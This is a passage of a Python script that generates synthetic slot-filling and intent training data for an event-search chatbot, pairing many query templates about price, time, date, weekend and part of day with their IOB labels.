"Will there be events holding on {date_start} that cost less than {price} dollars?",
"Will there be events occurring on {date_start} that cost less than {price} dollars?",
"Will there be events on {date_start} that cost less than {price} dollars?",
"Will there be events that cost around {price} dollars holding on {date_start}?",
"Will there be events that cost around {price} dollars occurring on {date_start}?",
"Will there be events that cost around {price} dollars on {date_start}?",
"Will there be events holding on {date_start} that cost around {price} dollars?",
"Will there be events occurring on {date_start} that cost around {price} dollars?",
"Will there be events on {date_start} that cost around {price} dollars?",
"Will there be events that cost ${price} holding on {date_start}?",
"Will there be events that cost ${price} occurring on {date_start}?",
"Will there be events that cost ${price} on {date_start}?",
"Will there be events holding on {date_start} that cost ${price}?",
"Will there be events occurring on {date_start} that cost ${price}?",
"Will there be events on {date_start} that cost ${price}?"
]
inform_date_start_and_part_of_day_template = [
"Tell me about events that are in {part_of_day} of {date_start}.",
"Tell me about events that are on {date_start} in {part_of_day}.",
"Tell me about events that are holding on {date_start} in {part_of_day}.",
"Tell me about events that are occurring on {date_start} in {part_of_day}.",
"Which events take place on {date_start} in the {part_of_day}.",
"I would like to find an event holding on {date_start} that is in {part_of_day}.",
"I would like to find an event on {date_start} that is in {part_of_day}.",
"I would like to find an event occurring on {date_start} that is in {part_of_day}.",
"What events are conducted on {date_start} in the {part_of_day}.",
"What events are conducted on {date_start} at {part_of_day}.",
"Will there be events that take place on {date_start} in {part_of_day}?",
"I want to know the events that are available on {date_start} at {part_of_day}.",
"I want to know the events that are available on {date_start} in the {part_of_day}.",
"Can you recommend some events holding on {date_start} start at {part_of_day}?",
"Can you recommend some events occurring on {date_start} start at {part_of_day}?",
"Can you recommend some events on {date_start} start at {part_of_day}?",
"Do you know any events on {date_start} begins in {part_of_day}?",
"Do you know any events holding on {date_start} begins in {part_of_day}?",
"Do you know any events occurring on {date_start} begins in {part_of_day}?",
"Do you know any events take palce {date_start} begins in {part_of_day}?",
"Do you have any suggestions on events holding on {date_start} in {part_of_day}?",
"Do you have any suggestions on events occurring on {date_start} in {part_of_day}?",
"I want to find some events holding on {date_start} in {part_of_day}.",
"I want to find some events occuring on {date_start} in {part_of_day}.",
"I want to find some events take place on {date_start} in {part_of_day}.",
"I want to find some events on {date_start} in {part_of_day}."
]
inform_time_and_price_template = [
"Do you know any free events at {time}?",
"Do you know any free events around {time}?",
"Tell me about some free events at {time}.",
"Tell me about some free events around {time}.",
"Tell me about some free events at around {time}.",
"Can you recommend me some free events at {time}?",
"Can you recommend me some free events around {time}?",
"Do you have any suggestions for free events at {time}?",
"Do you have any suggestions for free events at around {time}?",
"Do you have any suggestions for free events around {time}?",
"Are there any events around {price} SGD at {time}.",
"Are there any events around {price} dollars, around {time}.",
"Are there any events around {price} dollar at around {time}.",
"Are there any events at {time} around {price} SGD.",
"Are there any events around {time} around {price} dollars.",
"Are there any events at around {time} around ${price}.",
"Are there any events less than {price} SGD at {time}.",
"Are there any events less than {price} dollars around {time}.",
"Are there any events less than {price} dollar at around {time}.",
"Are there any events at {time} less than {price} dollars.",
"Are there any events around {time} less than {price} SGD.",
"Are there any events at around {time} less than ${price}.",
"Are there any events around ${price} at {time}.",
"Are there any events around ${price} at around {time}.",
"Are there any events at {time} around ${price}.",
"Are there any events at around {time}, around ${price}.",
"I would like to find an event that costs {price} dollars at {time}.",
"I would like to find an event that costs {price} SGD around {time}.",
"I would like to find an event that costs {price} dollar at around {time}.",
"I would like to find an event beginning at {time} that costs {price} dollars.",
"I would like to find an event holding at {time} that costs {price} dollar.",
"I would like to find an event occurring at {time} that costs {price} SGD.",
"I would like to find an event at {time} that costs ${price}.",
"I would like to find an event around {time} that costs {price} dollars.",
"I would like to find an event at around {time} that costs {price} dollars.",
"I would like to find an event that costs ${price} holding at {time}.",
"I would like to find an event that costs ${price} occurring at {time}.",
"I would like to find an event that costs ${price} beginning at {time}.",
"I would like to find an event that costs ${price} ad begins at {time}.",
"I would like to find an event that costs ${price} at around {time}.",
"I would like to find an event that costs ${price} around {time}.",
"I would like to find an event at {time} that costs ${price}.",
"I would like to find an event at around {time} that costs ${price}.",
"I would like to find an event around {time} that costs ${price}.",
"Let me know if there are events that are around {price} SGD holding at {time}.",
"Let me know if there are events that are around {price} dollars occurring at {time}.",
"Let me know if there are events that are around {price} dollar at {time}.",
"Let me know if there are events that are around {price} dollar at around {time}.",
"Let me know if there are events that are around {price} dollars around {time}.",
"Let me know if there are events at {time} that are around {price} dollars.",
"Let me know if there are events at around {time} that are around {price} SGD.",
"Let me know if there are events around {time} that are around {price} dollars.",
"Let me know if there are events that are less than {price} dollars at {time}.",
"Let me know if there are events that are less than {price} SGD around {time}.",
"Let me know if there are events that are less than {price} dollar at around {time}.",
"Let me know if there are events at {time} that are less than {price} dollar.",
"Let me know if there are events around {time} that are less than {price} dollar.",
"Let me know if there are events at around {time} that are less than {price} SGD.",
"Let me know if there are events holding around {time} that are less than {price} dollar.",
"Let me know if there are events holding at around {time} that are less than {price} dollar.",
"Let me know if there are events that are around ${price} holding at {time}.",
"Let me know if there are events that are around ${price} holding at around {time}.",
"Let me know if there are events that are around ${price} at {time}.",
"Let me know if there are events that are around ${price} at around {time}.",
"Let me know if there are events holding at {time} that are around ${price}.",
"Let me know if there are events holding at around {time} that are around ${price}.",
"Let me know if there are events at {time} that are around ${price}.",
"Let me know if there are events at around {time} that are around ${price}.",
"Will there be events that cost less than {price} SGD holding at {time}?",
"Will there be events that cost less than {price} SGD occurring at {time}?",
"Will there be events that cost less than {price} dollars at {time}?",
"Will there be events that cost less than {price} dollars holding at around {time}?",
"Will there be events holding at {time} that cost less than {price} SGD?",
"Will there be events occurring at {time} that cost less than {price} SGD?",
"Will there be events at {time} that cost less than {price} dollar?",
"Will there be events holding at around {time} that cost less than {price} dollar?",
"Will there be events beginning at around {time} that cost less than {price} dollars?",
"Will there be events that cost around {price} dollars, holding at {time}?",
"Will there be events that cost around {price} dollar, at {time}?",
"Will there be events that cost around {price} SGD, occuring at {time}?",
"Will there be events that cost around {price} dollar, at around {time}?",
"Will there be events holding at {time} that cost around {price} dollars?",
"Will there be events at {time} that cost around {price} dollars?",
"Will there be events occuring at {time} that cost around {price} SGD?",
"Will there be events at around {time} that cost around {price} SGD?",
"Will there be events that cost ${price} holding at {time}?",
"Will there be events that cost ${price} occuring at {time}?",
"Will there be events that cost ${price} at {time}?",
"Will there be events that cost ${price} holding at around {time}?",
"Will there be events that cost ${price} begin at around {time}?"
]
inform_time_and_is_weekend_template = [
"I would like to know about events that are around {time} on {is_weekend}.",
"I would like to know about events on {is_weekend} that are around {time}.",
"Are there any events that start at {time} on {is_weekend}?",
"Are there any events on {is_weekend} that start at {time}?",
"Tell me about events around {time} on {is_weekend}.",
"Tell me about events on {is_weekend} around {time}.",
"Will there be any events around {time} on {is_weekend}?",
"Will there be any events on {is_weekend} around {time}?",
"I want to know if there are events at {time} on {is_weekend}?",
"I want to know if there are events on {is_weekend} at {time}?",
"Do you know any events start at {time} on {is_weekend}?",
"Do you know any events on {is_weekend} start at {time}?",
"Can you recommend any event begins around {time} on {is_weekend}?",
"Can you recommend any event on {is_weekend} begins around {time}?",
"Can I know some events at around {time} on {is_weekend}?",
"Can I know some events on {is_weekend} at around {time}?",
"I would like to know about events holding around {time} on {is_weekend}.",
"I would like to know about events holding on {is_weekend} around {time}.",
"I would like to know about events occurring around {time} on {is_weekend}.",
"I would like to know about events occurring on {is_weekend} around {time}.",
"Tell me about events holding around {time} on {is_weekend}.",
"Tell me about events holding on {is_weekend} around {time}.",
"Tell me about events occurring around {time} on {is_weekend}.",
"Tell me about events occurring on {is_weekend} around {time}.",
"Will there be any events holding around {time} on {is_weekend}?",
"Will there be any events holding on {is_weekend} around {time}?",
"Will there be any events occurring around {time} on {is_weekend}?",
"I want to know if there are events holding at {time} on {is_weekend}?",
"I want to know if there are events holding on {is_weekend} at {time}?",
"I want to know if there are events occurring at {time} on {is_weekend}?",
"I want to know if there are events occurring on {is_weekend} at {time}?",
"Can you recommend any event begins around {time} on {is_weekend}?",
"Can you recommend any event on {is_weekend} begins around {time}?",
"Can I know some events that begin at around {time} on {is_weekend}?",
"Can I know some events on {is_weekend} that begin at around {time}?",
"Can I know some events beginning at around {time} on {is_weekend}?",
"Can I know some events on {is_weekend} beginning at around {time}?"
]
inform_price_and_is_weekend_template = [
"Do you know any free events on {is_weekend}?",
"Do you know any free events holding on {is_weekend}?",
"Do you know any free events occurring on {is_weekend}?",
"Do you know any free events taking place on {is_weekend}?",
"Tell me about some free events on {is_weekend}.",
"Tell me about some free events holding on {is_weekend}.",
"Tell me about some free events occuring on {is_weekend}.",
"Tell me about some free events that take place on {is_weekend}.",
"Tell me about some free events taking place on {is_weekend}.",
"Can you recommend me some free events taking place on {is_weekend}?",
"Can you recommend me some free events that take place on {is_weekend}?",
"Can you recommend me some free events holding on {is_weekend}?",
"Can you recommend me some free events occurring on {is_weekend}?",
"Can you recommend me some free events on {is_weekend}?",
"Do you have any suggestions for free events occurring on {is_weekend}?",
"Do you have any suggestions for free events holding on {is_weekend}?",
"Do you have any suggestions for free events on {is_weekend}?",
"Do you have any suggestions for free events taking place on {is_weekend}?",
"Do you have any suggestions for free events that take place on {is_weekend}?",
"Are there any events around {price} dollars taking place on {is_weekend}.",
"Are there any events around {price} dollars holing on {is_weekend}.",
"Are there any events around {price} dollars occuring on {is_weekend}.",
"Are there any events around {price} dollars that take place on {is_weekend}.",
"Are there any events dollars taking place on {is_weekend} around {price} SGD.",
"Are there any events dollars holing on {is_weekend} around {price} SGD.",
"Are there any events dollars occuring on {is_weekend} around {price} SGD.",
"Are there any events dollars that take place on {is_weekend} around {price} SGD.",
"Are there any events less than {price} dollars on {is_weekend}.",
"Are there any events less than {price} dollars holding on {is_weekend}.",
"Are there any events less than {price} dollars taking place on {is_weekend}.",
"Are there any events less than {price} dollars occurring on {is_weekend}.",
"Are there any events less than {price} dollars that take place on {is_weekend}.",
"Are there any events on {is_weekend} that are less than {price} dollars.",
"Are there any events holding on {is_weekend} that are less than {price} dollars.",
"Are there any events taking place on {is_weekend} that are less than {price} dollars.",
"Are there any events occurring on {is_weekend} that are less than {price} dollars.",
"Are there any events around ${price} holding on {is_weekend}.",
"Are there any events around ${price} occurring on {is_weekend}.",
"Are there any events around ${price} on {is_weekend}.",
"Are there any events around ${price} taking place on {is_weekend}.",
"Are there any events holding on {is_weekend} that are around ${price}.",
"Are there any events occurring on {is_weekend} that are around ${price}.",
"Are there any events on {is_weekend} around ${price}.",
"Are there any events taking place on {is_weekend} and are around ${price}.",
"I would like to find an event that costs {price} dollars on {is_weekend}.",
"I would like to find an event that costs {price} dollars holding on {is_weekend}.",
"I would like to find an event that costs {price} dollars occurring on {is_weekend}.",
"I would like to find an event that costs {price} dollars taking place on {is_weekend}.",
"I would like to find an event on {is_weekend} that costs {price} dollars.",
"I would like to find an event holding on {is_weekend} that costs {price} dollars.",
"I would like to find an event occurring on {is_weekend} that costs {price} dollars.",
"I would like to find an event taking place on {is_weekend} that costs {price} dollars.",
"I would like to find an event that costs ${price} on {is_weekend}.",
"I would like to find an event that costs ${price} holding on {is_weekend}.",
"I would like to find an event that costs ${price} occurring on {is_weekend}.",
"I would like to find an event that costs ${price} taking place on {is_weekend}.",
"I would like to find an event on {is_weekend} that costs ${price}.",
"I would like to find an event holding on {is_weekend} that costs ${price}.",
"I would like to find an event occurring on {is_weekend} that costs ${price}.",
"I would like to find an event taking place on {is_weekend} that costs ${price}.",
"Let me know if there are events that are around {price} dollars on {is_weekend}.",
"Let me know if there are events that are around {price} dollars holding on {is_weekend}.",
"Let me know if there are events that are around {price} dollars occurring on {is_weekend}.",
"Let me know if there are events that are around {price} dollars taking plae on {is_weekend}.",
"Let me know if there are events on {is_weekend} that are around {price} dollars.",
"Let me know if there are events holding on {is_weekend} that are around {price} dollars.",
"Let me know if there are events occurring on {is_weekend} that are around {price} dollars.",
"Let me know if there are events taking plae on {is_weekend} that are around {price} dollars.",
"Let me know if there are events that are less than {price} dollars on {is_weekend}.",
"Let me know if there are events that are less than {price} dollars holding on {is_weekend}.",
"Let me know if there are events that are less than {price} dollars occurring on {is_weekend}.",
"Let me know if there are events that are less than {price} dollars taking place on {is_weekend}.",
"Let me know if there are events on {is_weekend} that are less than {price} dollars.",
"Let me know if there are events holding on {is_weekend} that are less than {price} dollars.",
"Let me know if there are events occurring on {is_weekend} that are less than {price} dollars.",
"Let me know if there are events taking place on {is_weekend} that are less than {price} dollars.",
"Let me know if there are events that are around ${price} on {is_weekend}.",
"Let me know if there are events that are around ${price} holding on {is_weekend}.",
"Let me know if there are events that are around ${price} occurring on {is_weekend}.",
"Let me know if there are events that are around ${price} taking plcae on {is_weekend}.",
"Let me know if there are events on {is_weekend} that are around ${price}.",
"Let me know if there are events holding on {is_weekend} that are around ${price}.",
"Let me know if there are events occurring on {is_weekend} that are around ${price}.",
"Let me know if there are events taking plcae on {is_weekend} that are around ${price}.",
"Will there be events that cost less than {price} dollars on {is_weekend}?",
"Will there be events that cost less than {price} dollars holding on {is_weekend}?",
"Will there be events that cost less than {price} dollars occurring on {is_weekend}?",
"Will there be events that cost less than {price} dollars taking place on {is_weekend}?",
"Will there be events on {is_weekend} that cost less than {price} dollars?",
"Will there be events holding on {is_weekend} that cost less than {price} dollars?",
"Will there be events occurring on {is_weekend} that cost less than {price} dollars?",
"Will there be events taking place on {is_weekend} that cost less than {price} dollars?",
"Will there be events that cost around {price} dollars on {is_weekend}?",
"Will there be events that cost around {price} dollars holding on {is_weekend}?",
"Will there be events that cost around {price} dollars occurring on {is_weekend}?",
"Will there be events that cost around {price} dollars taking place on {is_weekend}?",
"Will there be events on {is_weekend} that cost around {price} dollars?",
"Will there be events holding on {is_weekend} that cost around {price} dollars?",
"Will there be events occurring on {is_weekend} that cost around {price} dollars?",
"Will there be events taking place on {is_weekend} that cost around {price} dollars?",
"Will there be events that cost ${price} on {is_weekend}?",
"Will there be events that cost ${price} holding on {is_weekend}?",
"Will there be events that cost ${price} occurring on {is_weekend}?",
"Will there be events that cost ${price} taking plcae on {is_weekend}?",
"Will there be events on {is_weekend} that cost ${price}?",
"Will there be events holding on {is_weekend} that cost ${price}?",
"Will there be events occurring on {is_weekend} that cost ${price}?",
"Will there be events taking plcae on {is_weekend} that cost ${price}?"
]
inform_price_and_part_of_day_template = [
"Do you know any free events in the {part_of_day}?",
"Do you know any free events holding in the {part_of_day}?",
"Tell me about some free events in the {part_of_day}.",
"Tell me about some free events occurring in the {part_of_day}.",
"Can you recommend me some free events at {part_of_day}?",
"Do you have any suggestions for free events in the {part_of_day}?",
"Do you have any suggestions for free events holding in the {part_of_day}?",
"Are there any events around {price} dollars in the {part_of_day}.",
"Are there any events in the {part_of_day} which are around {price} dollars.",
"Are there any events holding in the {part_of_day} which are around {price} dollars.",
"Are there any events around {price} SGD at {part_of_day}.",
"Are there any events at {part_of_day} around {price} SGD.",
"Are there any events at {part_of_day} which are around {price} SGD.",
"Are there any events less than {price} dollars in the {part_of_day}.",
"Are there any events less than {price} dollars occurring in the {part_of_day}.",
"Are there any events in the {part_of_day} which are less than {price} dollars.",
"Are there any events occurring in the {part_of_day} which are less than {price} dollars.",
"Are there any events less than {price} SGD holding in the {part_of_day}.",
"Are there any events that hold in the {part_of_day} and are less than {price} SGD.",
"Are there any events around ${price} in the {part_of_day}.",
"Are there any events around ${price} holding in the {part_of_day}.",
"I would like to find an event that costs {price} dollars at {part_of_day}.",
"I would like to find an event holding at {part_of_day} that costs {price} dollars.",
"I would like to find an event that costs {price} SGD and is in the {part_of_day}.",
"I would like to find an event that is in the {part_of_day} and costs {price} SGD.",
"I would like to find an event in the {part_of_day} that costs ${price}.",
"I would like to find an event at {part_of_day} that costs ${price}.",
"Let me know if there are events that are around {price} dollars in the {part_of_day}.",
"Let me know if there are events in the {part_of_day} that are around {price} dollars.",
"Let me know if there are events occurring in the {part_of_day} that are around {price} dollars.",
"Let me know if there are events holding in the {part_of_day} that are around {price} dollars.",
"Let me know if there are events taking place in the {part_of_day} that are around {price} dollars.",
"Let me know if there are events taking place at {part_of_day} that are around {price} SGD.",
"Let me know if there are events holding at {part_of_day} that are around {price} SGD.",
"Let me know if there are events at {part_of_day} that are around {price} SGD.",
"Let me know if there are events that are less than {price} dollars in the {part_of_day}.",
"Let me know if there are events in the {part_of_day} that are less than {price} dollars.",
"Let me know if there are events holding in the {part_of_day} that are less than {price} dollars.",
"Let me know if there are events occurring in the {part_of_day} that are less than {price} dollars.",
"Let me know if there are events in the {part_of_day} that are less than {price} SGD.",
"Let me know if there are events taking place in the {part_of_day} that are less than {price} SGD.",
"Let me know if there are events less than {price} SGD that are taking place in the {part_of_day}.",
"Let me know if there are events less than {price} SGD that are holding in the {part_of_day}.",
"Let me know if there are events that are around ${price} at {part_of_day}.",
"Let me know if there are events at {part_of_day} that are around ${price}.",
"Let me know if there are events that are around {price} SGD in the {part_of_day}.",
"Let me know if there are events in the {part_of_day} that are around {price} SGD.",
"Will there be events that cost less than {price} dollars in the {part_of_day}?",
"Will there be events in the {part_of_day} that cost less than {price} dollars?",
"Will there be events holding in the {part_of_day} that cost less than {price} dollars?",
"Will there be events occurring in the {part_of_day} that cost less than {price} dollars?",
"Will there be events that cost less than {price} SGD in the {part_of_day}?",
"Will there be events in the {part_of_day} that cost less than {price} SGD?",
"Will there be events taking place in the {part_of_day} that cost less than {price} SGD?",
"Will there be events that cost around {price} dollars in the {part_of_day}?",
"Will there be events in the {part_of_day} that cost around {price} dollars?",
"Will there be events at {part_of_day} that cost around {price} dollars?",
"Will there be events that cost around {price} SGD at {part_of_day}?",
"Will there be events at {part_of_day} that cost around {price} SGD?",
"Will there be events that cost ${price} holding in the {part_of_day}?",
"Will there be events holding in the {part_of_day} that cost ${price}?",
"Will there be events that cost {price} SGD at {part_of_day}?",
"Will there be events at {part_of_day} that cost {price} SGD?",
"Will there be events holding at {part_of_day} that cost {price} SGD?"
]
inform_is_weekend_and_part_of_day_template = [
"Tell me about events that on {is_weekend} in the {part_of_day}.",
"Tell me about events that on {is_weekend} {part_of_day}.",
"Tell me about {part_of_day} events that on {is_weekend}.",
"Tell me about events in the {part_of_day} of {is_weekend}.",
"Which events take place on {is_weekend} in the {part_of_day}.",
"Which events take place on {is_weekend} {part_of_day}.",
"Which {part_of_day} events take place on {is_weekend}.",
"Which events take place in the {part_of_day} of a {is_weekend}.",
"I would like to find an event that is on {is_weekend} {part_of_day}.",
"I would like to find an {part_of_day} event that is on {is_weekend}.",
"I would like to find an event in the {part_of_day} that is on {is_weekend}.",
"I would like to find an event in the {part_of_day} of a {is_weekend}.",
"What events are conducted on {is_weekend} {part_of_day}.",
"What {part_of_day} events are conducted on {is_weekend}.",
"What events are conducted in the {part_of_day} of a {is_weekend}.",
"Will there be events that take place on {is_weekend} {part_of_day}?",
"Will there be {part_of_day} events that take place on {is_weekend}?",
"Will there be events that take place at {part_of_day} of a {is_weekend}?",
"I want to know the events that are available on {is_weekend} {part_of_day}.",
"I want to know the {part_of_day} events that are available on {is_weekend}.",
"I want to know the {part_of_day} events that are available on {is_weekend}.",
"Can you recommend some events on {is_weekend} {part_of_day}?",
"Can you recommend some {part_of_day} events on {is_weekend}?",
"Can you recommend some events in the {part_of_day} of a {is_weekend}?",
"Do you have any suggestions on events on {is_weekend} {part_of_day}?",
"Do you have any suggestions on {part_of_day} events on {is_weekend}?",
"I want to find some events on {is_weekend} {part_of_day}.",
"I want to find some {part_of_day} events on {is_weekend}."
]
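# Generation phase: expand every template with sample slot values and write
# two output streams -- IOB_training.txt gets each sentence followed by its
# space-separated IOB label line, and User_intent.txt gets each sentence
# followed by its dialog-act id. As an illustrative sketch only (this helper
# is not defined or called anywhere in this script), the single-slot
# labelling logic used in the loops below amounts to:
#
#     def bio_labels(template, value, tag):
#         """tag is a (B-xxx, I-xxx) pair such as inform_venue_name_tag."""
#         tokens = list(filter(None, template.split(' ')))
#         labels = ['O'] * (len(tokens) - 1)   # one label per non-slot token
#         index = tokens.index('{}')           # slot position in the template
#         labels.insert(index, tag[0])         # B- tag on the first slot word
#         for _ in range(len(value.split()) - 1):
#             labels.insert(index + 1, tag[1]) # I- tags for the remaining words
#         return labels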
file_1 = open('IOB_training.txt', 'w')
file_2 = open('User_intent.txt', 'a+')
count = 0
################## inform 1 slot ###############
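# For each (value, template) pair: strip punctuation so template tokens align
# with the whitespace-split sentence, start from all-'O' labels, insert the
# B- tag at the placeholder position, then pad with I- tags until the label
# sequence is as long as the filled-in sentence. Pairs whose lengths still
# disagree are printed for inspection instead of being written out.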
for venue_name in sample_venue_name:
for template in inform_venue_name_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(venue_name)
label_list = ['O' for i in range(len(token_list)-1)]
index = token_list.index("{}")
label_list.insert(index, inform_venue_name_tag[0])
for i in range(len(list(filter(None, sentence.split(' ')))) - len(label_list)):
label_list.insert(index + 1, inform_venue_name_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for region in sample_region:
for template in inform_region_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(region)
label_list = ['O' for i in range(len(token_list)-1)]
index = token_list.index("{}")
label_list.insert(index, inform_region_tag[0])
for i in range(len(list(filter(None, sentence.split(' ')))) - len(label_list)):
label_list.insert(index + 1, inform_region_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for event_host in sample_event_host:
for template in inform_event_host_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(event_host)
label_list = ['O' for i in range(len(token_list)-1)]
index = token_list.index("{}")
label_list.insert(index, inform_event_host_tag[0])
for i in range(len(list(filter(None, sentence.split(' ')))) - len(label_list)):
label_list.insert(index + 1, inform_event_host_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for date_start in sample_date_start:
for template in inform_date_start_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(date_start)
label_list = ['O' for i in range(len(token_list)-1)]
index = token_list.index("{}")
label_list.insert(index, inform_date_start_tag[0])
for i in range(len(list(filter(None, sentence.split(' ')))) - len(label_list)):
label_list.insert(index + 1, inform_date_start_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for time in sample_time:
for template in inform_time_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(time)
label_list = ['O' for i in range(len(token_list)-1)]
index = token_list.index("{}")
label_list.insert(index, inform_time_tag[0])
for i in range(len(list(filter(None, sentence.split(' ')))) - len(label_list)):
label_list.insert(index + 1, inform_time_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for price in sample_price:
for template in inform_price_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(price)
label_list = ['O' for i in range(len(token_list)-1)]
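# A price template contains one of three anchors: a bare '{}', a '${}' with
# the dollar sign attached, or the literal word 'free' (no slot to fill, so
# format() leaves the sentence unchanged and 'free' itself gets the B- tag).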
try:
index = token_list.index("{}")
except ValueError:
try:
index = token_list.index("${}")
except ValueError:
index = token_list.index("free")
label_list.insert(index, inform_price_tag[0])
for i in range(len(list(filter(None, sentence.split(' ')))) - len(label_list)):
label_list.insert(index + 1, inform_price_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for is_weekend in sample_is_weekend:
for template in inform_is_weekend_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(is_weekend)
label_list = ['O' for i in range(len(token_list)-1)]
index = token_list.index("{}")
label_list.insert(index, inform_is_weekend_tag[0])
for i in range(len(list(filter(None, sentence.split(' ')))) - len(label_list)):
label_list.insert(index + 1, inform_is_weekend_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for part_of_day in sample_part_of_day:
for template in inform_part_of_day_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(part_of_day)
label_list = ['O' for i in range(len(token_list)-1)]
index = token_list.index("{}")
label_list.insert(index, inform_part_of_day_tag[0])
for i in range(len(list(filter(None, sentence.split(' ')))) - len(label_list)):
label_list.insert(index + 1, inform_part_of_day_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
################## inform 2 slots ###############
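# Two-slot templates are labelled in two passes: tag the first slot against
# the raw template, then re-render the template with the first slot filled in
# (leaving the second placeholder intact) so that the second slot's token
# index is computed against the partially expanded sentence, keeping it
# consistent with the labels already inserted.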
for venue_name in sample_venue_name:
for region in sample_region:
for template in inform_venue_name_and_region_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(venue_name = venue_name, region = region)
label_list = ['O' for i in range(len(token_list) - 2)]
index_venue_name = token_list.index("{venue_name}")
label_list.insert(index_venue_name, inform_venue_name_tag[0])
for i in range(len(list(filter(None, venue_name.split(' '))))-1):
label_list.insert(index_venue_name+1, inform_venue_name_tag[1])
token_list = template.format(venue_name = venue_name, region = "{region}").split(' ')
index_region = token_list.index("{region}")
label_list.insert(index_region, inform_region_tag[0])
for i in range(len(list(filter(None, region.split(' ')))) - 1):
label_list.insert(index_region + 1, inform_region_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for venue_name in sample_venue_name:
for event_host in sample_event_host:
for template in inform_venue_name_and_event_host_template:
template = template.replace('.', '').replace('?', '').replace(',', '').replace('-','')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(venue_name = venue_name, event_host = event_host)
label_list = ['O' for i in range(len(token_list) - 2)]
index_venue_name = token_list.index("{venue_name}")
label_list.insert(index_venue_name, inform_venue_name_tag[0])
for i in range(len(list(filter(None, venue_name.split(' '))))-1):
label_list.insert(index_venue_name+1, inform_venue_name_tag[1])
token_list = template.format(venue_name = venue_name, event_host = "{event_host}").split(' ')
index_event_host = token_list.index("{event_host}")
label_list.insert(index_event_host, inform_event_host_tag[0])
for i in range(len(list(filter(None, event_host.split(' ')))) - 1):
label_list.insert(index_event_host + 1, inform_event_host_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for venue_name in sample_venue_name:
for date_start in sample_date_start:
for template in inform_venue_name_and_date_start_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(venue_name = venue_name, date_start = date_start)
label_list = ['O' for i in range(len(token_list) - 2)]
index_venue_name = token_list.index("{venue_name}")
label_list.insert(index_venue_name, inform_venue_name_tag[0])
for i in range(len(list(filter(None, venue_name.split(' '))))-1):
label_list.insert(index_venue_name+1, inform_venue_name_tag[1])
token_list = template.format(venue_name = venue_name, date_start = "{date_start}").split(' ')
index_date_start = token_list.index("{date_start}")
label_list.insert(index_date_start, inform_date_start_tag[0])
for i in range(len(list(filter(None, date_start.split(' ')))) - 1):
label_list.insert(index_date_start + 1, inform_date_start_tag[1])
if len(label_list) != len(sentence.split()):
print(sentence)
print(' '.join(label_list))
else:
count += 1
file_1.write(sentence + '\n')
file_1.write(' '.join(label_list) + '\n')
file_2.write(sentence + '\n')
file_2.write(str(dialog_config.DIALOG_ACT['INFORM']) + '\n')
for venue_name in sample_venue_name:
for time in sample_time:
for template in inform_venue_name_and_time_template:
template = template.replace('.', '').replace('?', '').replace(',', '')
token_list = list(filter(None, template.split(' ')))
sentence = template.format(venue_name = venue_name, time = time)
label_list = ['O' for i in range(len(token_list) - 2)]
index_venue_name = token_list.index("{venue_name}")
